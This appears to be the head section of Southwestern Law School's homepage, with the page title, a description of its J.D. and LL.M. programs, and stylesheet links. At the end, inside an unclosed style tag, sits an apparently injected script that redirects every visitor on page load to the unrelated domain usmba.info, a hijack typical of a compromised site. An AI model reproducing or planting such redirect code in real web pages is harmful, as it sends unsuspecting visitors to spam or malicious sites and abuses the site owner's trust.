  <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
          lang="en">
    <head>
    <meta http-equiv="Content-Type"
          content="application/xhtml+xml;charset=utf-8" />
    
    <title>
    Southwestern Law School&mdash; Los Angeles
    </title>
    
    
        
            <base href="http://www.swlaw.edu/index_html" />
        
    
    
    <meta content="Southwestern Law School offers three-year (3-year) J.D. (full-time) and four-year (4-year) J.D. (part-time day or evening) programs, an alternative two-year (2-year) J.D. program, as well as an LL.M. in entertainment law and media law. The Los Angeles CA campus includes the historic art deco Bullocks Wilshire landmark and provides a vibrant setting for the study of law. Fully ABA-approved. Independent, nonprofit, nonsectarian. Founded in 1911."
          name="description" />


    
    
    
    
    <link rel="alternate stylesheet" type="text/css"
          media="screen"
          href="http://www.swlaw.edu/ploneTextSmall.css"
          title="Small Text" />
    <link rel="alternate stylesheet" type="text/css"
          media="screen"
          href="http://www.swlaw.edu/ploneTextLarge.css"
          title="Large Text" />
    <link rel="stylesheet" type="text/css" media="print"
          href="http://www.swlaw.edu/plonePrint.css" />
    <link rel="stylesheet" type="text/css"
          media="projection"
          href="http://www.swlaw.edu/plonePresentation.css" />



    <style>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
